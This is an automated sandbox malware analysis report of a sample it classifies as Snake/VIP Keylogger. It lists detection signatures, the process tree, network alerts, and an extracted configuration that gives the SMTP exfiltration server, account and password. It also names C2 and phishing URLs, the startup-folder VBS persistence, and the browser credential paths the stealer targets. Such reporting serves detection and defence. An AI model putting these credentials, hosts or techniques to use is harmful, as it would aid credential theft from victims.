Edit tour

Windows Analysis Report
oagkiAhXgZ.exe

Overview

General Information

Sample name:	oagkiAhXgZ.exe renamed because original name is a hash value
Original sample name:	fef805cfe8df23b5e42e59c3505ba7b9014c2cf3e9ac9346b3badba3c086053c.exe
Analysis ID:	1585976
MD5:	eb8c8acae9d3a669129902384f5335b2
SHA1:	f0f9aa5f20c2721eacc7e2b660c46b585b653ee2
SHA256:	fef805cfe8df23b5e42e59c3505ba7b9014c2cf3e9ac9346b3badba3c086053c
Tags:	exeMassLoggeruser-adrian__luca
Infos:

Detection

Snake Keylogger, VIP Keylogger

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Drops script at startup location

Suricata IDS alerts for network traffic

Yara detected Snake Keylogger

Yara detected Telegram RAT

Yara detected VIP Keylogger

.NET source code references suspicious native API functions

AI detected suspicious sample

Binary is likely a compiled AutoIt script file

Contains functionality to capture screen (.Net source)

Contains functionality to log keystrokes (.Net Source)

Drops VBS files to the startup folder

Found API chain indicative of sandbox detection

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Sigma detected: WScript or CScript Dropper

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Yara detected Generic Downloader

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to communicate with device drivers

Contains functionality to dynamically determine API calls

Contains functionality to execute programs as a different user

Contains functionality to launch a process as a different user

Contains functionality to launch a program with higher privileges

Contains functionality to modify clipboard data

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains functionality to shutdown / reboot the system

Contains functionality to simulate keystroke presses

Contains functionality to simulate mouse events

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Detected potential crypto function

Drops PE files

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

OS version to string mapping found (often used in BOTs)

Potential key logger detected (key state polling based)

Queries the volume information (name, serial number etc) of a device

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

oagkiAhXgZ.exe (PID: 1876 cmdline: "C:\Users\user\Desktop\oagkiAhXgZ.exe" MD5: EB8C8ACAE9D3A669129902384F5335B2)

reindulgence.exe (PID: 768 cmdline: "C:\Users\user\Desktop\oagkiAhXgZ.exe" MD5: EB8C8ACAE9D3A669129902384F5335B2)

RegSvcs.exe (PID: 4612 cmdline: "C:\Users\user\Desktop\oagkiAhXgZ.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

wscript.exe (PID: 1472 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reindulgence.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)

reindulgence.exe (PID: 5316 cmdline: "C:\Users\user\AppData\Local\Thebesian\reindulgence.exe" MD5: EB8C8ACAE9D3A669129902384F5335B2)

RegSvcs.exe (PID: 5488 cmdline: "C:\Users\user\AppData\Local\Thebesian\reindulgence.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: VIP Keylogger

{"Exfil Mode": "SMTP", "Email ID": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587"}

Threatname: Snake Keylogger

{"Exfil Mode": "SMTP", "Username": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x30d66:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b29e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a941:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab9e:$a4: \Orbitum\User Data\Default\Login Data 0x3b57d:$a5: \Kometa\User Data\Default\Login Data
00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x2f06b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x2f080:$s4: _hook
00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2daa0:$a1: get_encryptedPassword 0x2e028:$a2: get_encryptedUsername 0x2d713:$a3: get_timePasswordChanged 0x2d82a:$a4: get_passwordField 0x2dab6:$a5: set_encryptedPassword 0x307d2:$a6: get_passwords 0x30b66:$a7: get_logins 0x307be:$a8: GetOutlookPasswords 0x30177:$a9: StartKeylogger 0x30abf:$a10: KeyLoggerEventArgs 0x30217:$a11: KeyLoggerEventArgsEventHandler
00000003.00000002.4503499824.0000000002A17000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000007.00000002.4503982433.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000003.00000002.4503499824.0000000002911000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x30d66:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b29e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a941:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab9e:$a4: \Orbitum\User Data\Default\Login Data 0x3b57d:$a5: \Kometa\User Data\Default\Login Data
00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x2f06b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x2f080:$s4: _hook
00000007.00000002.4503982433.00000000030F9000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: reindulgence.exe PID: 768	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: reindulgence.exe PID: 768	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: reindulgence.exe PID: 768	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: reindulgence.exe PID: 768	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2cb63e:$a1: get_encryptedPassword 0x2cbbbc:$a2: get_encryptedUsername 0x2cb2c0:$a3: get_timePasswordChanged 0x2cb3d7:$a4: get_passwordField 0x2cb654:$a5: set_encryptedPassword 0x2ce318:$a6: get_passwords 0x2ce6a8:$a7: get_logins 0x2ce304:$a8: GetOutlookPasswords 0x2cdcbd:$a9: StartKeylogger 0x2ce601:$a10: KeyLoggerEventArgs 0x2cdd5d:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 4612	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 4612	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: RegSvcs.exe PID: 4612	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: RegSvcs.exe PID: 4612	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xc15de:$a1: get_encryptedPassword 0xc1b5c:$a2: get_encryptedUsername 0xc1260:$a3: get_timePasswordChanged 0xc1377:$a4: get_passwordField 0xc15f4:$a5: set_encryptedPassword 0xc42b8:$a6: get_passwords 0xc4648:$a7: get_logins 0xc42a4:$a8: GetOutlookPasswords 0xc3c5d:$a9: StartKeylogger 0xc45a1:$a10: KeyLoggerEventArgs 0xc3cfd:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: reindulgence.exe PID: 5316	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: reindulgence.exe PID: 5316	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
Process Memory Space: reindulgence.exe PID: 5316	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: reindulgence.exe PID: 5316	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xe77bfa:$a1: get_encryptedPassword 0xe78178:$a2: get_encryptedUsername 0xe7787c:$a3: get_timePasswordChanged 0xe77993:$a4: get_passwordField 0xe77c10:$a5: set_encryptedPassword 0xe7a8d4:$a6: get_passwords 0xe7ac64:$a7: get_logins 0xe7a8c0:$a8: GetOutlookPasswords 0xe7a279:$a9: StartKeylogger 0xe7abbd:$a10: KeyLoggerEventArgs 0xe7a319:$a11: KeyLoggerEventArgsEventHandler
Process Memory Space: RegSvcs.exe PID: 5488	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: RegSvcs.exe PID: 5488	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 31 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
2.2.reindulgence.exe.1b40000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.reindulgence.exe.1b40000.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.reindulgence.exe.1b40000.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.reindulgence.exe.1b40000.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
2.2.reindulgence.exe.1b40000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3949e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b41:$a3: \Google\Chrome\User Data\Default\Login Data 0x38d9e:$a4: \Orbitum\User Data\Default\Login Data 0x3977d:$a5: \Kometa\User Data\Default\Login Data
2.2.reindulgence.exe.1b40000.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
6.2.reindulgence.exe.1080000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.reindulgence.exe.1080000.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
6.2.reindulgence.exe.1080000.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
6.2.reindulgence.exe.1080000.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.2.reindulgence.exe.1080000.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x30d66:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
6.2.reindulgence.exe.1080000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b29e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a941:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab9e:$a4: \Orbitum\User Data\Default\Login Data 0x3b57d:$a5: \Kometa\User Data\Default\Login Data
6.2.reindulgence.exe.1080000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x2f06b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x2f080:$s4: _hook
6.2.reindulgence.exe.1080000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
6.2.reindulgence.exe.1080000.1.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
6.2.reindulgence.exe.1080000.1.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
6.2.reindulgence.exe.1080000.1.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2bea0:$a1: get_encryptedPassword 0x2c428:$a2: get_encryptedUsername 0x2bb13:$a3: get_timePasswordChanged 0x2bc2a:$a4: get_passwordField 0x2beb6:$a5: set_encryptedPassword 0x2ebd2:$a6: get_passwords 0x2ef66:$a7: get_logins 0x2ebbe:$a8: GetOutlookPasswords 0x2e577:$a9: StartKeylogger 0x2eebf:$a10: KeyLoggerEventArgs 0x2e617:$a11: KeyLoggerEventArgsEventHandler
6.2.reindulgence.exe.1080000.1.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3949e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x38b41:$a3: \Google\Chrome\User Data\Default\Login Data 0x38d9e:$a4: \Orbitum\User Data\Default\Login Data 0x3977d:$a5: \Kometa\User Data\Default\Login Data
6.2.reindulgence.exe.1080000.1.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2d264:$s1: UnHook 0x2d26b:$s2: SetHook 0x2d273:$s3: CallNextHook 0x2d280:$s4: _hook
2.2.reindulgence.exe.1b40000.1.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
2.2.reindulgence.exe.1b40000.1.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
2.2.reindulgence.exe.1b40000.1.raw.unpack	JoeSecurity_VIPKeylogger	Yara detected VIP Keylogger	Joe Security
2.2.reindulgence.exe.1b40000.1.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
2.2.reindulgence.exe.1b40000.1.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x2dca0:$a1: get_encryptedPassword 0x2e228:$a2: get_encryptedUsername 0x2d913:$a3: get_timePasswordChanged 0x2da2a:$a4: get_passwordField 0x2dcb6:$a5: set_encryptedPassword 0x309d2:$a6: get_passwords 0x30d66:$a7: get_logins 0x309be:$a8: GetOutlookPasswords 0x30377:$a9: StartKeylogger 0x30cbf:$a10: KeyLoggerEventArgs 0x30417:$a11: KeyLoggerEventArgsEventHandler
2.2.reindulgence.exe.1b40000.1.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x3b29e:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x3a941:$a3: \Google\Chrome\User Data\Default\Login Data 0x3ab9e:$a4: \Orbitum\User Data\Default\Login Data 0x3b57d:$a5: \Kometa\User Data\Default\Login Data
2.2.reindulgence.exe.1b40000.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_DotNetProcHook	Detects executables with potential process hoocking	ditekSHen	0x2f064:$s1: UnHook 0x2f06b:$s2: SetHook 0x2f073:$s3: CallNextHook 0x2f080:$s4: _hook
Click to see the 21 entries

Sigma Signatures

System Summary

Sigma detected: WScript or CScript Dropper

Source: Process started

Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reindulgence.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reindulgence.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reindulgence.vbs" , ProcessId: 1472, ProcessName: wscript.exe

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Source: Process started

Author: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reindulgence.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reindulgence.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reindulgence.vbs" , ProcessId: 1472, ProcessName: wscript.exe

Data Obfuscation

Sigma detected: Drops script at startup location

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe, ProcessId: 768, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reindulgence.vbs

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T15:44:07.334959+0100	2803305	3	Unknown Traffic	192.168.2.5	49706	188.114.96.3	443	TCP
2025-01-08T15:44:08.719105+0100	2803305	3	Unknown Traffic	192.168.2.5	49708	188.114.96.3	443	TCP
2025-01-08T15:44:10.024728+0100	2803305	3	Unknown Traffic	192.168.2.5	49710	188.114.96.3	443	TCP
2025-01-08T15:44:15.290825+0100	2803305	3	Unknown Traffic	192.168.2.5	49718	188.114.96.3	443	TCP
2025-01-08T15:44:24.025560+0100	2803305	3	Unknown Traffic	192.168.2.5	49766	188.114.96.3	443	TCP
2025-01-08T15:44:29.389726+0100	2803305	3	Unknown Traffic	192.168.2.5	49810	188.114.96.3	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T15:44:05.738136+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49704	132.226.247.73	80	TCP
2025-01-08T15:44:06.722541+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49704	132.226.247.73	80	TCP
2025-01-08T15:44:08.066253+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49707	132.226.247.73	80	TCP
2025-01-08T15:44:22.284959+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49754	132.226.247.73	80	TCP
2025-01-08T15:44:23.456846+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49754	132.226.247.73	80	TCP
2025-01-08T15:44:24.753710+0100	2803274	2	Potentially Bad Traffic	192.168.2.5	49772	132.226.247.73	80	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T15:44:17.531327+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49726	149.154.167.220	443	TCP
2025-01-08T15:44:34.287910+0100	1810007	1	Potentially Bad Traffic	192.168.2.5	49844	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: oagkiAhXgZ.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://anotherarmy.dns.army:8081	Avira URL Cloud: Label: phishing
Source: http://aborters.duckdns.org:8081	Avira URL Cloud: Label: phishing
Source: http://varders.kozow.com:8081	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe

Avira: detection malicious, Label: HEUR/AGEN.1319493

Found malware configuration

Source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587", "Version": "4.4"}
Source: 2.2.reindulgence.exe.1b40000.1.unpack	Malware Configuration Extractor: VIP Keylogger {"Exfil Mode": "SMTP", "Email ID": "sammys@gtpv.online", "Password": "7213575aceACE@@", "Host": "mail.gtpv.online", "Port": "587"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe

ReversingLabs: Detection: 63%

Multi AV Scanner detection for submitted file

Source: oagkiAhXgZ.exe

ReversingLabs: Detection: 63%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: oagkiAhXgZ.exe

Joe Sandbox ML: detected

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: oagkiAhXgZ.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49760 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.5:49844 version: TLS 1.2

Source:	Binary string: wntdll.pdbUGP source: reindulgence.exe, 00000002.00000003.2091283334.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, reindulgence.exe, 00000002.00000003.2091160949.0000000003980000.00000004.00001000.00020000.00000000.sdmp, reindulgence.exe, 00000006.00000003.2255477042.0000000003960000.00000004.00001000.00020000.00000000.sdmp, reindulgence.exe, 00000006.00000003.2256338604.00000000037C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: reindulgence.exe, 00000002.00000003.2091283334.0000000003B20000.00000004.00001000.00020000.00000000.sdmp, reindulgence.exe, 00000002.00000003.2091160949.0000000003980000.00000004.00001000.00020000.00000000.sdmp, reindulgence.exe, 00000006.00000003.2255477042.0000000003960000.00000004.00001000.00020000.00000000.sdmp, reindulgence.exe, 00000006.00000003.2256338604.00000000037C0000.00000004.00001000.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00B0DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	0_2_00B0DBBE
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00ADC2A2 FindFirstFileExW,	0_2_00ADC2A2
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00B168EE FindFirstFileW,FindClose,	0_2_00B168EE
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00B1698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	0_2_00B1698F
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00B0D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B0D076
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00B0D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	0_2_00B0D3A9
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00B19642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B19642
